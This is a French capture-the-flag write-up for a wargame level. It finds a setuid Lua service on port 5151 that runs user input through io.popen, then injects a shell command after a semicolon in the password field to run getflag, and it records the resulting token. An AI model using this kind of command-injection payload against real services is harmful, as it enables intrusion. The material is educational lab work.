27 lines
		
	
	
		
			961 B
		
	
	
	
		
			Plaintext
		
	
	
	
			
		
		
	
	
			27 lines
		
	
	
		
			961 B
		
	
	
	
		
			Plaintext
		
	
	
	
* Dans le home il y a un script lua
 | 
						|
 | 
						|
$ ll
 | 
						|
> rwsr-sr-x  1 flag11  level11  668 Mar  5  2016 level11.lua*
 | 
						|
 | 
						|
* Ca semble etre un server. On tante de se conecter au localhost avec le port 5151
 | 
						|
$ nc localhost 5151
 | 
						|
> Password: kjksd
 | 
						|
> Erf nope..
 | 
						|
 | 
						|
* Il semblerait donc que ce soit bien a ce stript lua que l'on comunique via netcat.
 | 
						|
* On peut trouver le nombre f05d1d066fb246efe0c6f7d095f909a7a0cf34a0.
 | 
						|
* Google nous apprend que c'est le hash de "NotSoEasy" toute fois ce mot de passe ne donne rien
 | 
						|
 | 
						|
* Par contre en observant mieux on voit qu'une chaine ne charactere comptenant 
 | 
						|
* le mot de passe que l'on envoie semble etre executer en shell avec les back quot line 11
 | 
						|
* io.popen() lance un souproces et execute la chaine e character qui lui est envoyer.
 | 
						|
* On va essayer de lancer getflag en arretant la comande avec ';'
 | 
						|
 | 
						|
$ nc localhost 5151
 | 
						|
> Password: ; /bin/getflag > /tmp/bingo
 | 
						|
 | 
						|
$ cat /tmp/bingo
 | 
						|
> Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
 | 
						|
 | 
						|
BINGO
 |